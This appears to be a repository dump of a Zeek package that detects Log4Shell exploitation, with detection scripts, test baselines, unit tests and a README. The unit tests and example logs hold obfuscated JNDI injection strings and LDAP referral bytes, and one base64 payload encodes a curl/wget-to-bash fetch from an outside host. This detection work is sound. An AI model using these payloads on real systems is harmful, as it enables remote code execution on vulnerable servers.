BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 
0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 13 | #close XXXX-XX-XX-XX-XX-XX 14 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-user_agent/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 
2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 10.10.10.31 53996 172.16.238.10 8080 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/log4shell/', payload_uri=172.16.238.11:1389/a, payload_stem=172.16.238.11:1389, payload_host=172.16.238.11, payload_port=1389, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:ldap://172.16.238.11:1389/a}' 10.10.10.31 172.16.238.10 8080 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 172.16.238.10 59274 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 
0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 50066 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 13 | #close XXXX-XX-XX-XX-XX-XX 14 | -------------------------------------------------------------------------------- /scripts/CVE_2021_44228_java_GET.zeek: -------------------------------------------------------------------------------- 1 | module CVE_2021_44228; 2 | # Refer to the following for a description of the method used in script. 3 | # https://corelight.com/blog/detecting-log4j-exploits-via-zeek-when-java-downloads-java 4 | 5 | redef enum Notice::Type += { 6 | ## Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class 7 | ## over HTTP indicating a potential second stage, after the primary LDAP 8 | ## request. Refer to sub field for user_agent and mime-type. 9 | LOG4J_JAVA_CLASS_DOWNLOAD, 10 | }; 11 | 12 | redef record HTTP::Info += { 13 | CVE_2021_44228_content_type: string &optional; 14 | CVE_2021_44228_detected: bool &default = F; 15 | }; 16 | 17 | # Anchoring Java at ^, as have only seen sample attacks with this. 18 | global java_UA_pattern : pattern = /^Java\//; 19 | # Adding java-serialized-object out of caution. 
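# Unsure if it can be used, but have not seen legit use except with POST method
global java_mime_pattern_header: pattern = /java-vm|java-serialized-object/i;
global java_mime_pattern_sniffed: pattern = /java-applet/;

# The first check uses the Server's HTTP Content-Type header.
#
# Raises LOG4J_JAVA_CLASS_DOWNLOAD when a GET request whose User-Agent matches
# java_UA_pattern receives a response whose Content-Type header matches
# java_mime_pattern_header. The first matching Content-Type of a transaction is
# remembered in c$http$CVE_2021_44228_content_type so the check is not repeated
# for the same transaction.
#
# c:       connection carrying the HTTP transaction
# is_orig: T for request headers (ignored here), F for response headers
# name:    header name (the comparison relies on this event delivering
#          upper-cased names, as the original "CONTENT-TYPE" check did)
# value:   header value
event http_header(c: connection, is_orig: bool, name: string, value: string)
	{
	# Only a client GET can be the JNDI code-base fetch; anything else, or a
	# transaction whose method was never seen, is out of scope.
	if ( ! c$http?$method || c$http$method != "GET" )
		return;
	# Only the server's Content-Type is of interest.
	if ( is_orig )
		return;
	# A Java Content-Type was already recorded for this transaction.
	if ( c$http?$CVE_2021_44228_content_type )
		return;
	if ( name != "CONTENT-TYPE" || java_mime_pattern_header !in value )
		return;

	c$http$CVE_2021_44228_content_type = value;

	# The User-Agent is client-supplied, so "Java/" is a heuristic for "the JVM
	# itself made this request", not proof of it.
	if ( ! c$http?$user_agent || java_UA_pattern !in c$http$user_agent )
		return;

	# The Host header is &optional in HTTP::Info (absent e.g. in HTTP/1.0
	# requests). Reading an unset field aborts this handler, which would
	# silently drop the notice, so fall back to "-" instead of assuming it.
	local req_host = "-";
	if ( c$http?$host )
		req_host = split_string1(c$http$host, /:/)[0];

	c$http$CVE_2021_44228_detected = T;
	add c$http$tags[LOG4J_RCE];
	NOTICE([$note=LOG4J_JAVA_CLASS_DOWNLOAD,
	        $conn=c,
	        $identifier=cat(c$id$orig_h,c$id$orig_p,c$id$resp_h,c$id$resp_p),
	        # $suppress_for=3600sec,
	        $msg=fmt("Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type"),
	        $sub=fmt("user_agent='%s', CONTENT-TYPE='%s', host='%s'", c$http$user_agent, c$http$CVE_2021_44228_content_type, req_host)]);
	}

# The second check uses the sniffed resp_mime_types, which can differ from the Server header.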
# Second chance for LOG4J_JAVA_CLASS_DOWNLOAD, driven by Zeek's sniffed MIME
# types rather than the server's Content-Type header.
#
# Only the first transaction of a connection (trans_depth <= 1) and only its
# response side is examined; a JVM that fetches the class on a reused
# keep-alive connection after an earlier request is therefore not seen here.
# A missing User-Agent does not rule the transaction out, a non-"Java/" one does.
event http_message_done(c: connection, is_orig: bool, stat: http_message_stat)
	{
	if ( is_orig || c$http$trans_depth > 1 )
		return;
	# Nothing to inspect without sniffed types, and nothing to add if the
	# Content-Type header check already raised the notice for this transaction.
	if ( ! c$http?$resp_mime_types || c$http$CVE_2021_44228_detected )
		return;
	if ( c$http?$user_agent && java_UA_pattern !in c$http$user_agent )
		return;

	local sniffed = join_string_vec(c$http$resp_mime_types, ",");
	if ( java_mime_pattern_sniffed !in sniffed )
		return;

	local ua = c$http?$user_agent ? c$http$user_agent : "";

	add c$http$tags[LOG4J_RCE];
	NOTICE([$note=LOG4J_JAVA_CLASS_DOWNLOAD,
	        $conn=c,
	        $identifier=cat(c$id$orig_h,c$id$orig_p,c$id$resp_h,c$id$resp_p),
	        # $suppress_for=3600sec,
	        $msg=fmt("Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and resp_mime_types"),
	        $sub=fmt("user_agent='%s', resp_mime_types='%s'", ua, sniffed)]);
	}
--------------------------------------------------------------------------------
/scripts/tests.zeek:
--------------------------------------------------------------------------------
module CVE_2021_44228;

# One table-driven test: input, whether exploit_pattern must match, the
# expected normalize() output and the expected parse_payload() result.
type TestCase: record {
	s: string;
	matches: bool;
	norm_s: string;
	pp: PayloadParts;
};

# Convenience constructor so each test case fits on one line.
function make_test_case(s: string, matches: bool, norm_s: string, uri: string, stem: string, host: string, port_: string): TestCase
	{
	local pp = PayloadParts($uri=uri, $stem=stem, $host=host, $port_=port_);
	return TestCase($s=s, $matches=matches, $norm_s=norm_s, $pp=pp);
	}

# Field-wise equality for PayloadParts.
function payload_equals(p1: PayloadParts, p2: PayloadParts): bool
	{
	return p1$uri == p2$uri && p1$stem == p2$stem && p1$host == p2$host && p1$port_ == p2$port_;
	}

# Unit tests; only run when run_tests is redef'd to T (see testing/log4j/unit).
event zeek_init()
	{
	if ( run_tests )
		{
		# TODO: Change these to use the table drive tests strategy with `TestCase`
		print(exploit_pattern in "https://ad.doubleclick.net/ddm/ad/N5631.507083IPINYOU.COM/B26871807.320905003;sz=1x1;ord=16396029064475833;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}?"
== F); 27 | print(exploit_pattern in "/index.php?s=/module/action/param1/${@Die(md5(HelloThinkPHP))}" == F); 28 | print(exploit_pattern in "/index?s=index/\think\Module/Action/Param/${@phpinfo()}" == F); 29 | print(exploit_pattern in "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}" == T); 30 | print(exploit_pattern in "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}" == T); 31 | print(exploit_pattern in "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=" == T); 32 | print(exploit_pattern in "https://foobarstuff.wiz.biz=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}" == F); 33 | print(normalize("${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=") == "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g="); 34 | print(normalize("${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}") == "${jndi:ldap://world80.log4j.binaryedge.io:80/ callback}"); 35 | print(normalize("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}") == "${jndi:ldap://45.146.164.160:1389/t}"); 36 | print(normalize("${jndi:${lower:l${lower:d${lower:a${lower:p}}}}://foo.bar/baz}") == "${jndi:ldap://foo.bar/baz}"); 37 | 38 | local empty_str_vector: vector of string; 39 | push("1"); 40 | print(stack == vector("1")); 41 | push("2"); 42 | print(stack == vector("1", "2")); 43 | push("3"); 44 | print(stack == 
vector("1", "2", "3")); 45 | print(peek() == "3"); 46 | print(pop() == "3"); 47 | print(peek() == "2"); 48 | print(pop() == "2"); 49 | print(peek() == "1"); 50 | print(pop() == "1"); 51 | print(peek() == ""); 52 | print(pop() == ""); 53 | push("1"); 54 | push("2"); 55 | push("3"); 56 | print(stack == vector("1", "2", "3")); 57 | clear_stack(); 58 | print(stack == empty_str_vector); 59 | 60 | local test_cases: vector of TestCase; 61 | test_cases += make_test_case("${${vgld:jfhv:zyh:c:tvrit:-j}${odm:t:stfd:vaxokx:qanuv:-n}${ufsgjh:tpr:wqlb:-d}${ohq:yyw:ovptvo:ftzg:bemff:-i}:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", T, "${jfhv:zyh:c:tvrit:-jt:stfd:vaxokx:qanuv:-ntpr:wqlb:-dyyw:ovptvo:ftzg:bemff:-i:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou}", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "6pe015373099ca36cc511d.y.psc3evgl.cou", "-"); 62 | test_cases += make_test_case("${jndi:corbal://0.17.149.63:30123/xvalystgst}", T, "${jndi:corbal://0.17.149.63:30123/xvalystgst}", "0.17.149.63:30123/xvalystgst", "0.17.149.63:30123", "0.17.149.63", "30123"); 63 | test_cases += make_test_case("${jndi:dns://9-99-149-125.example.net/va}", T, "${jndi:dns://9-99-149-125.example.net/va}", "9-99-149-125.example.net/va", "9-99-149-125.example.net", "9-99-149-125.example.net", "-"); 64 | test_cases += make_test_case("${jndi:http://0.8.149.07:30871/xvalystgst}", T, "${jndi:http://0.8.149.07:30871/xvalystgst}", "0.8.149.07:30871/xvalystgst", "0.8.149.07:30871", "0.8.149.07", "30871"); 65 | test_cases += make_test_case("${jndi:iiop://0.96.149.90:08425/xvalystgst}", T, "${jndi:iiop://0.96.149.90:08425/xvalystgst}", "0.96.149.90:08425/xvalystgst", "0.96.149.90:08425", "0.96.149.90", "08425"); 66 | test_cases += make_test_case("${jndi:ldap://.gf8.rv/mmm}", T, "${jndi:ldap://.gf8.rv/mmm}", ".gf8.rv/mmm", ".gf8.rv", ".gf8.rv", "-"); 67 | test_cases += make_test_case("${jndi:ldap://dvuuy_hostnaug./a}", T, "${jndi:ldap://dvuuy_hostnaug./a}", 
"dvuuy_hostnaug./a", "dvuuy_hostnaug.", "dvuuy_hostnaug.", "-"); 68 | test_cases += make_test_case("${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", T, "${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class}", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou", "-"); 69 | test_cases += make_test_case("${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", T, "${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a}", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml", "-"); 70 | test_cases += make_test_case("${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", T, "${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk}", "pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk", "pqn.ae:1954", "pqn.ae", "1954"); 71 | test_cases += make_test_case("${jndi:loqgrn${loqgr:s}://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", T, "${jndi:loqgrns://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co}", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co", "-"); 72 | test_cases += 
make_test_case("${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-di${gnk:gnk_naug:-:}${gnk:gnk_naug:-l}d${gnk:gnk_naug:-a}p${gnk:gnk_naug:-:}//30.137.173.178:5851/q ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t", T, "${loqgrndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-dignk_naug:-:}gnk_naug:-l}dgnk_naug:-a}pgnk_naug:-:}//30.137.173.178:5851/q ndi:ldap://30.137.173.178:1954/t} j}n}d}i}:l}d}a}p}://30.137.173.178:1954/t", "30.137.173.178:1954/t", "30.137.173.178:1954", "30.137.173.178", "1954"); 73 | 74 | for ( i in test_cases ) 75 | { 76 | print(test_cases[i]$s); 77 | print(exploit_pattern in test_cases[i]$s == test_cases[i]$matches); 78 | print(normalize(test_cases[i]$s) == test_cases[i]$norm_s); 79 | print(payload_equals(parse_payload(test_cases[i]$s), test_cases[i]$pp)); 80 | } 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-44228 2 | 3 | A Zeek package which raises notices, tags HTTP connections and optionally generates a log for Log4J 4 | (CVE-2021-44228) attempts. 5 | 6 | - Detects payload contained in HTTP headers: See [Simplifying Detection of 7 | Log4Shell](https://corelight.com/blog/simplifying-detection-of-log4shell) for 8 | details. 

- [Uses Zeek signatures](scripts/ldap_java.sig) to generate notices when an LDAP
search result carrying Java naming-reference attributes (`javaClassName`,
`javaCodeBase`, `javaFactory`) is returned to the victim, i.e. a JNDI server
pointing the JVM at a class to load. See [Detecting Log4j via Zeek & LDAP traffic](https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic) for
details.

- Detects when the second stage Java class is downloaded (an HTTP `GET` with a
`Java/` User-Agent whose response carries a Java class MIME type), regardless of
payload and first stage detection. See [Detecting Log4j exploits via Zeek when Java downloads Java](https://corelight.com/blog/detecting-log4j-exploits-via-zeek-when-java-downloads-java) for details.


## Installation

`$ zkg install cve-2021-44228`

Use against a pcap you already have (`-r` takes the pcap; the package's
`__load__.zeek` follows as the script to run):

`$ zeek -Cr your.pcap scripts/__load__.zeek`

If you install from a `git clone`'d version of the repository, note that it
defaults to the development branch. Install from `master` or a release for a
more stable version of the package.

## Options and notes:

- `CVE_2021_44228::log` determines if the `log4j` log is generated. Defaults to `T`.
- `CVE_2021_44228::ignorable_target_hosts` is a set of `target_host`s to ignore, where `target_host` is the host parsed out of the `${jndi:...://host:port/...}` payload (the attacker's callback server). It is a `set[string]` so both IPs and domains can be ignored; entries are compared exactly against the `target_host` column of `log4j.log`. Ignored targets raise no notice and are not logged, but the connection is still tagged `LOG4J_RCE` in `http.log`.
- `CVE_2021_44228::ignorable_orig_hosts` is a set of `addr`s (the connection's `id.orig_h`, e.g. known benign scanners) whose header matches are ignored entirely: no notice, no log entry, no tag.
- `CVE_2021_44228::ignorable_resp_hosts` is the same, but keyed on the responding host (`id.resp_h`).
- `CVE_2021_44228::try_normalize` determines if normalizing the payload (undoing common `${lower:...}`/`${::-x}` obfuscation) should be attempted before parsing. Defaults to `T`.
- The three ignore lists above are consulted only by the header detection (`LOG4J_ATTEMPT_HEADER`); `LOG4J_LDAP_JAVA` and `LOG4J_JAVA_CLASS_DOWNLOAD` are raised regardless.

## Example Notices

This package generates three distinct notices:

1. `LOG4J_ATTEMPT_HEADER`
1. `LOG4J_LDAP_JAVA`
1. `LOG4J_JAVA_CLASS_DOWNLOAD`

`LOG4J_ATTEMPT_HEADER` flags potential attempts based on HTTP header data: a `${...:...}` lookup string in a request or response header name or value. It is deliberately broad, so false positives are expected; use the ignore lists above to tune it. These are also logged to `log4j` if enabled.

```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-14-11-50-29
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639350256.733555 Cp7gaS3nVqVl49obpb 154.65.28.250 57932 172.16.4.58 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 154.65.28.250 172.16.4.58 80 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-14-11-50-29
```

`LOG4J_LDAP_JAVA` detects an LDAP search result that hands the victim JVM a Java
naming reference (`javaClassName`, `javaCodeBase`, `javaFactory`,
`objectClass=javaNamingReference`), i.e. the JNDI server telling the JVM where to
fetch a class from; the class bytes themselves then travel over HTTP (covered by
`LOG4J_JAVA_CLASS_DOWNLOAD`). Because the victim only performs this LDAP search
after evaluating an injected `${jndi:...}` lookup, and we see it happen
infrequently in practice, it makes for a good proxy detection for possibly
successful exploits.
63 | 64 | ``` 65 | #separator \x09 66 | #set_separator , 67 | #empty_field (empty) 68 | #unset_field - 69 | #path notice 70 | #open 2021-12-16-20-54-13 71 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 72 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 73 | 1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - - 74 | 1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 
0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - - 75 | 1639425834.635341 CUM0KZ3MLUfNB0cl11 172.16.238.10 57742 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - - 76 | #close 2021-12-16-20-54-13 77 | ``` 78 | 79 | Finally, `LOG4J_JAVA_CLASS_DOWNLOAD` generates a notice when we are confident 80 | that Java downloads more Java. As above, this happens sufficiently rarely to be 81 | a useful proxy detection. 82 | 83 | ``` 84 | #separator \x09 85 | #set_separator , 86 | #empty_field (empty) 87 | #unset_field - 88 | #path notice 89 | #open XXXX-XX-XX-XX-XX-XX 90 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 91 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 92 | XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. 
Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 93 | XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 94 | #close 2021-12-126-19-17-58 95 | ``` 96 | 97 | ## Example Log (`log4j.log`) 98 | 99 | ``` 100 | #separator \x09 101 | #set_separator , 102 | #empty_field (empty) 103 | #unset_field - 104 | #path log4j 105 | #open 2021-12-14-11-50-29 106 | #fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value 107 | #types time string string string string string string string bool string string bool bool 108 | 1639350256.733555 Cp7gaS3nVqVl49obpb / 45.83.193.150:1389/Exploit 45.83.193.150:1389 45.83.193.150 1389 GET T AUTHORIZATION Bearer ${jndi:ldap://45.83.193.150:1389/Exploit} F T 109 | #close 2021-12-14-11-50-29 110 | ``` 111 | 112 | ## References 113 | 114 | 1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228 115 | 1. https://corelight.com/blog/simplifying-detection-of-log4shell 116 | -------------------------------------------------------------------------------- /scripts/CVE_2021_44228.zeek: -------------------------------------------------------------------------------- 1 | module CVE_2021_44228; 2 | # Refer to the following for a description of the methods used in script. 
